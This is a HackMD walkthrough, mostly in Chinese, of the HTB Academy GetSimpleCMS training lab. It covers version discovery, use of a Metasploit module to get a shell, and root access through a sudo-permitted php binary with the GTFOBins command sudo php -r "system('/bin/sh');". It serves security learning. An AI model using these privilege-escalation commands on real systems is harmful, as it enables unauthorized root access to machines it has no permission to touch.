Try   HackMD
tags: HTB ACADEMY GETTING STARTED

GetSimpleCMS

step1. Information Enumeration

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

step2. Exploit

發現後台,但是經過嘗試之後沒有找到登入帳密,繼續尋找其他突破口

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

發現當前CMS版本號,先記錄下來待會可以用msfconsole掃看看

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

msfconsole -> search getsimple 3.3.15

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

use it! -> show options

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

設定完RHOST和LHOST跑看看,他這邊不需要設定RPORT

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

成功進去拿到shell

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

step3. Privilege Escalation

tool:https://gtfobins.github.io/gtfobins/php/#sudo

sudo -l , 發現一個不需要root密碼也能執行的php檔案

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

嘗試看看能不能透過php來提權

CMD="/bin/sh"
sudo php -r "system('$CMD');"

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

成功拿下root shell!

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Last changed by 
王威翔
0
367

Read more

000gggd

000gggd

Mar 29, 2025
Nibbles

step1. Information Enumeration nmap -sC -sV 10.129.66.130 只有發現80和22端口 step2. Exploit 首頁打開只有行文字,查看註解之後發現有個資料夾可以看看 https://10.129.66.130/nibbleblog

Aug 31, 2021
Privilege Escalation (特權提升)

題目1. SSH to 46.101.23.188 with user "user1" and password "password1" SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'. //需要使用user1 連線進去並且打開user2的文件 sudo -u user2/bin/bash 取得user2的使用權 題目2. Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

Aug 24, 2021
SEO 課程內容

Robots.txt 控制被檢索內容 節省檢索預算 避免重覆內容 提交XML Sitemap user-agent:* Disallow: /admin 指定檔案 Disallow: /print*/ print開頭的資料夾皆排除

Aug 20, 2021
Read more from 王威翔
Published on HackMD